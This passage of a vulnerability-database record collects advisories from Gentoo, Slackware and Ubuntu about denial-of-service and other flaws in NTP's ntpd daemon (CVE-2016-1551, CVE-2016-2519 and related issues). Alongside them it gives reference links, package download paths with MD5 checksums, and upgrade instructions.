http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2016-120-01)\n\nNew ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. \n This release patches several low and medium severity security issues:\n CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering\n CVE-2016-1549: Sybil vulnerability: ephemeral association attack,\n AKA: ntp-sybil - MITIGATION ONLY\n CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion\n botch\n CVE-2016-2517: Remote configuration trustedkey/requestkey values are not\n properly validated\n CVE-2016-2518: Crafted addpeer with hmode \u003e 7 causes array wraparound with\n MATCH_ASSOC\n CVE-2016-2519: ctl_getitem() return value not always checked\n CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos\n CVE-2016-1548: Interleave-pivot - MITIGATION ONLY\n CVE-2015-7704: KoD fix: peer associations were broken by the fix for\n NtpBug2901, AKA: Symmetric active/passive mode is broken\n CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks\n CVE-2016-1550: Improve NTP security against buffer comparison timing attacks,\n authdecrypt-timing, AKA: authdecrypt-timing\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ndfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\naa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ndbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz\n\nSlackware x86_64 -current package:\n7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niEYEARECAAYFAlcjyyAACgkQakRjwEAQIjPtSgCdEB0YxCNSAabWZwD+ICyXcqeg\n3rIAnRLKXh7P6QXP2t+va4PM0crnd3l4\n=VO7T\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2016-1551" }, { "db": "CERT/CC", "id": "VU#718152" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "BID", "id": "88219" }, { "db": "VULMON", "id": "CVE-2016-1551" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-1551", "trust": 3.0 }, { "db": "CERT/CC", "id": "VU#718152", "trust": 2.6 }, { "db": "BID", "id": "88219", "trust": 2.0 }, { "db": "TALOS", "id": "TALOS-2016-0132", "trust": 1.7 }, { "db": "SECTRACK", "id": "1035705", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU91176422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-007711", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201604-606", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-1551", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136864", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1551" }, { "db": "BID", "id": "88219" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-1551" }, { "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "id": "VAR-201701-0422", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.33987721 }, "last_update_date": "2023-12-18T11:19:07.843000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.ntp.org" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.ntpsec.org/" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "ntpd Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61289" }, { "title": "Red Hat: CVE-2016-1551", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-1551" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2016/04/28/time_for_a_patch_six_vulns_fixed_in_ntp_daemon/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-1551" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-254", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "NVD", "id": "CVE-2016-1551" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.8, "url": "http://www.securityfocus.com/bid/88219" }, { "trust": 1.8, "url": "https://www.kb.cert.org/vuls/id/718152" }, { "trust": 1.7, "url": "http://www.talosintelligence.com/reports/talos-2016-0132/" }, { "trust": 1.4, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1035705" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20171004-0002/" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:16.ntp.asc" }, { "trust": 0.9, "url": "http://support.ntp.org/bin/view/main/ntpbug3020" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91176422/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1551" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983803" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory7.asc" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/254.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1551" }, { "db": "BID", "id": "88219" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-1551" }, { "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1551" }, { "db": "BID", "id": "88219" }, { "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-1551" }, { "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-27T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-01-27T00:00:00", "db": "VULMON", "id": "CVE-2016-1551" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "88219" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-05-02T21:38:58", "db": "PACKETSTORM", "id": "136864" }, { "date": "2017-01-27T17:59:00.227000", "db": "NVD", "id": "CVE-2016-1551" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-28T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-11-21T00:00:00", "db": "VULMON", "id": "CVE-2016-1551" }, { "date": "2016-09-08T20:01:00", "db": "BID", "id": "88219" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007711" }, { "date": "2017-11-21T02:29:03.353000", "db": "NVD", "id": "CVE-2016-1551" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-606" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-606" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP.org ntpd contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#718152" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lack of information", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-606" } ], "trust": 0.6 } }
var-201701-0396
Vulnerability from variot
ntpd in NTP before 4.2.8p7 and 4.3.x before 4.3.92 allows remote attackers to cause a denial of service (ntpd abort) by a large request data value, which triggers the ctl_getitem function to return a NULL value. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ========================================================================== Ubuntu Security Notice USN-3349-1 July 05, 2017
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 17.04
- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in NTP.
Software Description: - ntp: Network Time Protocol daemon and utility programs
Details:
Yihan Lian discovered that NTP incorrectly handled certain large request data values. This issue only affected Ubuntu 16.04 LTS. (CVE-2016-2519)
Miroslav Lichvar discovered that NTP incorrectly handled certain spoofed addresses when performing rate limiting. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7426)
Matthew Van Gundy discovered that NTP incorrectly handled certain crafted broadcast mode packets. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428)
Miroslav Lichvar discovered that NTP incorrectly handled certain responses. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7429)
Sharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly handled origin timestamps of zero. A remote attacker could possibly use this issue to bypass the origin timestamp protection mechanism. This issue only affected Ubuntu 16.10. (CVE-2016-7431)
Brian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly performed initial sync calculations. This issue only applied to Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7433)
Magnus Stubman discovered that NTP incorrectly handled certain mrulist queries. This issue only affected Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7434)
Matthew Van Gund discovered that NTP incorrectly handled origin timestamp checks. This issue only affected Ubuntu Ubuntu 16.10, and Ubuntu 17.04. (CVE-2016-9042)
Matthew Van Gundy discovered that NTP incorrectly handled certain control mode packets. A remote attacker could use this issue to set or unset traps. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9310)
Matthew Van Gundy discovered that NTP incorrectly handled the trap service. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9311)
It was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6458)
It was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only applied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. (CVE-2017-6460)
It was discovered that the NTP legacy DPTS refclock driver incorrectly handled the /dev/datum device. (CVE-2017-6462)
It was discovered that NTP incorrectly handled certain invalid settings in a :config directive. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)
